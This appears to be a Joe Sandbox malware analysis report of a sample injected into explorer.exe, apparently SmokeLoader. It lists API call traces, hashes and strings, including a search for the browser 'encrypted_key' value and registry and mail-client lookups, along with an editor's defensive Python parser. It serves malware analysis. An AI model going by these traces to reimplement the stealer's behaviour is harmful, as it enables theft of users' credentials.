                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File_alldiv_allmul
                                                                                                        • String ID: winTruncate1$winTruncate2
                                                                                                        • API String ID: 3568847005-470713972
                                                                                                        • Opcode ID: 9f64b87702b53571c5ac95373f1313de8b7de0b7a5df19fa5ea0566726ecb4ce
                                                                                                        • Instruction ID: e2500d6f2d4c127f8f88fc14c679a96f1d22df1520eac375fb5de7ff07829d66
                                                                                                        • Opcode Fuzzy Hash: 9f64b87702b53571c5ac95373f1313de8b7de0b7a5df19fa5ea0566726ecb4ce
                                                                                                        • Instruction Fuzzy Hash: DD216D76302300AFDF54DE29CC84EAB77A9EF88311B158569EE28DB685D735D810CBA1
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • wsprintfW.USER32 ref: 030F4AA2
                                                                                                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 030F4AC7
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F4AD4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                        • String ID: %s\%08x$Software
                                                                                                        • API String ID: 1800864259-1658101971
                                                                                                        • Opcode ID: d7a3ed9f40f7c41930e51c1cb7472be0792dc9109f1257cb5ca89a07beed3a25
                                                                                                        • Instruction ID: 1cdc2d72eb666babc8ed3c29c31776733e09c23dbd0bcc73650de4dca7436aa2
                                                                                                        • Opcode Fuzzy Hash: d7a3ed9f40f7c41930e51c1cb7472be0792dc9109f1257cb5ca89a07beed3a25
                                                                                                        • Instruction Fuzzy Hash: 3C01D475601208BFDB18DB55DC4ADBF77ADEB49658B40016EFA05A3101D7B15D409670
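This card shows the function building a key name with the format `%s\%08x` and the literal `Software`, then calling RegCreateKeyExW on hive 80000001 with access mask 000F003F. Read together (this editor's inference; the report does not state it) that is a key of the form HKCU\Software\<8 hex digits> created with KEY_ALL_ACCESS, which is the registry artifact a responder would hunt for. The report prints all such constants as raw hex, so the script below, an added example and not Joe Sandbox or SmokeLoader code, parses API lines in the report's own format, decodes hive handles and `samDesired` masks from winreg.h values, and flags key-creating calls that carry write rights. Its sample input copies five lines from the cards on this page; the signed value the report prints for the RegOpenKeyExW inside 030F19E5 is kept as a 32-bit mask and decoded bit by bit rather than guessed at. The triage rule at the end is the editor's own.

```python
"""Parse the API lines of a Joe Sandbox function card and decode the registry
constants the report prints as raw hex.

Added example for this report, not Joe Sandbox or SmokeLoader code.  SAMPLE
copies five API lines from the report above.  The HKCU\\Software\\<%08x>
reading of the RegCreateKeyExW call and the triage rule in registry_writes()
are this editor's, not the report's.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE = """
• RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 030F4AC7
• RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 030F2EE4
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 030F4335
• Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
• wsprintfW.USER32 ref: 030F4AA2
"""

_LINE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
_HEX = re.compile(r"^-?[0-9A-Fa-f]{8}$")  # the report prints every number as 8 hex digits

HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
         0x80000005: "HKEY_CURRENT_CONFIG"}
# winreg.h access rights: composite masks are matched first, then single bits
KEY_COMPOSITE = [(0x000F003F, "KEY_ALL_ACCESS"), (0x00020019, "KEY_READ"), (0x00020006, "KEY_WRITE")]
KEY_BITS = [(0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
            (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
            (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY")]
KEY_WRITE_BITS = 0x0002 | 0x0004                      # KEY_SET_VALUE | KEY_CREATE_SUB_KEY
SAM_INDEX = {"RegOpenKeyExW": 3, "RegCreateKeyExW": 5}  # argument position of samDesired
WRITE_APIS = {"RegCreateKeyW", "RegCreateKeyExW", "RegSetValueExW"}


@dataclass
class Call:
    api: str
    module: str
    args: list                     # int for hex values, None for "?", str for literals
    ref: int                       # address of the call instruction
    parent: Optional[str] = None   # set for "Part of subcall function X" lines


def _arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if _HEX.match(tok):
        return int(tok, 16) & 0xFFFFFFFF  # the report sometimes prints values signed
    return tok                             # a literal such as PortNumber or .exe


def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), m["parent"]))
    return calls


def decode_access(mask: int) -> str:
    """Render a samDesired mask as winreg.h names; unknown bits stay as hex."""
    names = []
    for value, name in KEY_COMPOSITE:
        if mask & value == value:
            names.append(name)
            mask &= ~value
    for bit, name in KEY_BITS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(f"0x{mask:08x}")
    return "|".join(names)


def hive_of(call: Call) -> Optional[str]:
    first = call.args[0] if call.args else None
    return HIVES.get(first) if isinstance(first, int) else None


def sam_of(call: Call) -> Optional[int]:
    idx = SAM_INDEX.get(call.api)
    return call.args[idx] if idx is not None and idx < len(call.args) else None


def registry_writes(calls: List[Call]) -> List[Call]:
    """Editor's triage rule: key creation/value writes under a known hive with write rights."""
    hits = []
    for c in calls:
        sam = sam_of(c)
        if c.api in WRITE_APIS and hive_of(c) and (sam is None or sam & KEY_WRITE_BITS):
            hits.append(c)
    return hits
```

On the sample lines `registry_writes` returns only the RegCreateKeyExW at 030F4AC7 (HKEY_CURRENT_USER, KEY_ALL_ACCESS); the RegOpenKeyExW at 030F2EE4 decodes to KEY_READ|KEY_WOW64_64KEY, which matches the enumeration-only behaviour of the card it comes from. Lines copied from other cards on this page, or from a different Joe Sandbox report, parse the same way.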
                                                                                                        APIs
                                                                                                        • _alloca_probe.NTDLL ref: 030F431C
                                                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 030F4335
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030F4363
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 030F43C8
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                          • Part of subcall function 030F418A: wsprintfW.USER32 ref: 030F4212
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030F43B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 801677237-0
                                                                                                        • Opcode ID: 3ad4647d9620ffcc9cc969b831cb64ee1c0310214438b4e361dae9b02efc121a
                                                                                                        • Instruction ID: 75332f0c0a827f8a5bdd52b34be6ddfccce6168d74e8ceb4754d8b19ac9a373c
                                                                                                        • Opcode Fuzzy Hash: 3ad4647d9620ffcc9cc969b831cb64ee1c0310214438b4e361dae9b02efc121a
                                                                                                        • Instruction Fuzzy Hash: E91130B5108305BFE719EB11DC44DBB77EDEB88348F00462DB989D6150EB749D489A72
                                                                                                        APIs
                                                                                                        • memset.NTDLL ref: 030FB8D5
                                                                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 030FB96F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFilememset
                                                                                                        • String ID: psow$winOpen
                                                                                                        • API String ID: 2416746761-4101858489
                                                                                                        • Opcode ID: 939b37d3c2e05a0f662c47917759a2bb1442501ed4202e3912c0bf0d137052c0
                                                                                                        • Instruction ID: 821935a1cba5ca134ebefc3883ff0473d6d7108d8adead10bb61aa2164a57269
                                                                                                        • Opcode Fuzzy Hash: 939b37d3c2e05a0f662c47917759a2bb1442501ed4202e3912c0bf0d137052c0
                                                                                                        • Instruction Fuzzy Hash: 12719F71A0A706AFC750DF28C88075ABBE4FF88724F044A2DFA649B680D775D954CF92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.0000000003157000.00000040.80000000.00040000.00000000.sdmp, Offset: 03157000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_3157000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a7ace883b1ee7f75617c8ccaa082c5bd808de063bf2191c76e602b520c42f1f
                                                                                                        • Instruction ID: 69a360c98480e74d5631bb8efc402d29ee9dd0487abfa1ddb5e7dcfd3937caa5
                                                                                                        • Opcode Fuzzy Hash: 0a7ace883b1ee7f75617c8ccaa082c5bd808de063bf2191c76e602b520c42f1f
                                                                                                        • Instruction Fuzzy Hash: C7A15C72914352DFD721CF78CDC06A0BBA5EB0A225B1C06ADEDF18B2C2E7605806C752
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 217796345-0
                                                                                                        • Opcode ID: f63c1d6e70016b756ec0cf4aa5790cacd585fc86c74db15cad5f2a3aae498f05
                                                                                                        • Instruction ID: 926e4de4c4c5f0d731e0d9a1d6a2e96a413c850fab2fb49c1bd8cd53b2da7dc9
                                                                                                        • Opcode Fuzzy Hash: f63c1d6e70016b756ec0cf4aa5790cacd585fc86c74db15cad5f2a3aae498f05
                                                                                                        • Instruction Fuzzy Hash: 3321917620A341EFE72CCA21DD04F7BB7EDEBC9758F080A2DFA8592540E725C940C661
                                                                                                        APIs
                                                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 030F1ED5
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030F1F0C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 030F1F98
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030F1F82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1077800024-0
                                                                                                        • Opcode ID: be2cda677ce33cb7df3486072b11a9cfb5230879fa4f9d33bbc1ae1343612a76
                                                                                                        • Instruction ID: 0ca9451d42ef6558cddc04ebebb3934d75dbb0a6a3ffc562650414f4890d2ba6
                                                                                                        • Opcode Fuzzy Hash: be2cda677ce33cb7df3486072b11a9cfb5230879fa4f9d33bbc1ae1343612a76
                                                                                                        • Instruction Fuzzy Hash: C5218CB5208301BFD709AB21DC48E6BBBEDEFC9248F00892DF59992110DB75C9099B62
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,030F3E1E,00000000,?,030F3FA8), ref: 030F1C46
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,030F3FA8), ref: 030F1C56
                                                                                                        • CloseHandle.KERNEL32(00000000,?,030F3FA8), ref: 030F1C91
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,030F3FA8), ref: 030F1C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2517252058-0
                                                                                                        • Opcode ID: 2f0ea687330a9859a67345a59fe57f285fdb1022398b723746ac3c167913d3fa
                                                                                                        • Instruction ID: 6d2d39b1b2922da810cd1219a07a410597fec62cfcf9f1104a3749ffac4b0572
                                                                                                        • Opcode Fuzzy Hash: 2f0ea687330a9859a67345a59fe57f285fdb1022398b723746ac3c167913d3fa
                                                                                                        • Instruction Fuzzy Hash: 61F0A431201218BFD328AA26DC88E7B7A9CDB8B7F9B160719F61593180DB53584541B1
                                                                                                        APIs
                                                                                                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,030F3E30,00000000,00000000,?,030F3FA8), ref: 030F2FC1
                                                                                                        • lstrlen.KERNEL32("encrypted_key":",?,030F3FA8), ref: 030F2FCE
                                                                                                        • StrStrIA.SHLWAPI("encrypted_key":",0314692C,?,030F3FA8), ref: 030F2FDD
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                          • Part of subcall function 030F190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                          • Part of subcall function 030F190B: lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                        • String ID: "encrypted_key":"
                                                                                                        • API String ID: 493641738-877455259
                                                                                                        • Opcode ID: b9535b1f90f9dddd02e363a8de2548922e7c0b9eaeca70d5d6beeb2018999b56
                                                                                                        • Instruction ID: 97f3b176cc7b35a9c96b67bb910f82212a7ad3b214c571f9f181c6b70115dd72
                                                                                                        • Opcode Fuzzy Hash: b9535b1f90f9dddd02e363a8de2548922e7c0b9eaeca70d5d6beeb2018999b56
                                                                                                        • Instruction Fuzzy Hash: E2E0222A70BB245F83A9FBB51C4488BBE8C9F4F8193080078E30297102DF928445C2B0
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 030FBB40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID: winDelete
                                                                                                        • API String ID: 3188754299-3936022152
                                                                                                        • Opcode ID: 862f4603546df5e8fc508c22e54634385feca7477ae91e396b2dc39aba4540f3
                                                                                                        • Instruction ID: a2812ad57d8ff63f631b7e310e47b6ac900b5b786fea864012ea246f68103590
                                                                                                        • Opcode Fuzzy Hash: 862f4603546df5e8fc508c22e54634385feca7477ae91e396b2dc39aba4540f3
                                                                                                        • Instruction Fuzzy Hash: 04110835B02308EFDB11FB68C8409BD77B9DBC5761F144665EA06D7A88DB70C9028F51
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 030F2EE4
                                                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 030F2F54
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F2F62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1066184869-0
                                                                                                        • Opcode ID: 4f2123147260d238a0806588f96fa5f7390f648baa3c88cf2a23d162fcfa8888
                                                                                                        • Instruction ID: ebbafb748c341a866134e8fdca0faaee01bc0e4525e49796f5002313e918dd5c
                                                                                                        • Opcode Fuzzy Hash: 4f2123147260d238a0806588f96fa5f7390f648baa3c88cf2a23d162fcfa8888
                                                                                                        • Instruction Fuzzy Hash: 7101DF39206310AF8718EB22DC049AFBBADEFC9340B00042DFA0996144CB758845DBA1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 4175140541-0
                                                                                                        • Opcode ID: 991ff8dcda80e973b724f7e571ccc82daf3ce4986d9c29627b4323828bbd63b9
                                                                                                        • Instruction ID: 28c08399af6ff94ab45100a7deb07d9673dba08a1f52f9261e99ddb3dc097c5c
                                                                                                        • Opcode Fuzzy Hash: 991ff8dcda80e973b724f7e571ccc82daf3ce4986d9c29627b4323828bbd63b9
                                                                                                        • Instruction Fuzzy Hash: CCC09B3C3453015FE6C47BF15C0DB0A355CAF4DB1BF045100F705C9485DB544085C632
                                                                                                        APIs
                                                                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 030F9FF8
                                                                                                        Strings
                                                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 030FA00E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateHeap
                                                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                        • API String ID: 10892065-982776804
                                                                                                        • Opcode ID: a484b6c9ff0338542cfc356d2ca460c4bde2ba3af027b8534ce8da8241affe8c
                                                                                                        • Instruction ID: 06d6df419f0b6e8e09c42423ab2a4e2063c52fdf5eb72635936b0bbd92e855e3
                                                                                                        • Opcode Fuzzy Hash: a484b6c9ff0338542cfc356d2ca460c4bde2ba3af027b8534ce8da8241affe8c
                                                                                                        • Instruction Fuzzy Hash: 3BF0F672746341BFEB32EA54AC88F6767DCD7C8B89F140829FB4996640E3706C408630
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,030F2E83,PathToExe,00000000,00000000), ref: 030F1B16
                                                                                                          • Part of subcall function 030F1011: GetProcessHeap.KERNEL32(00000000,00000000,?,030F1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2), ref: 030F1020
                                                                                                          • Part of subcall function 030F1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1027
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 030F1B40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 2162223993-2036018995
                                                                                                        • Opcode ID: 69d83fdaad9c585b860c69ef42ca2de5ac7216e2b2357624cc56275e51ed01b7
                                                                                                        • Instruction ID: eeb8ab52b5278a4a33e0ef87e5f1f027f921baa381718be21b1f40d56569038f
                                                                                                        • Opcode Fuzzy Hash: 69d83fdaad9c585b860c69ef42ca2de5ac7216e2b2357624cc56275e51ed01b7
                                                                                                        • Instruction Fuzzy Hash: 75F0B43B70174CEFDA19FA6BDC80E6B768ECBC62A630A0069F65997644EE136C015274
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 030FA35F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID: winSeekFile
                                                                                                        • API String ID: 973152223-3168307952
                                                                                                        • Opcode ID: 70466815c6aaad2ddd66c31cdb18902169b270edbac7e9ebf2dd38cf569fee21
                                                                                                        • Instruction ID: 17635924ff7f23ead3ee21f85e880b2d1a4abd1610fef21be711f862c88e351d
                                                                                                        • Opcode Fuzzy Hash: 70466815c6aaad2ddd66c31cdb18902169b270edbac7e9ebf2dd38cf569fee21
                                                                                                        • Instruction Fuzzy Hash: DCF09031715304AFDB12EF64DC00AAB77AEEB48321B148669BD75CA6C4DB70DD409AA0
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(051F0000,00000000,?), ref: 030F9EB5
                                                                                                        Strings
                                                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 030F9ECD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                        • API String ID: 1279760036-667713680
                                                                                                        • Opcode ID: b4f0edd643aca22d0bb443568e3cc623249a94c72b3492faf0725f05239dbc5a
                                                                                                        • Instruction ID: 76d3add12e7f1f8f2d1dbdbbb33af2e5d1f10878aa99ce8219636d1419838fe4
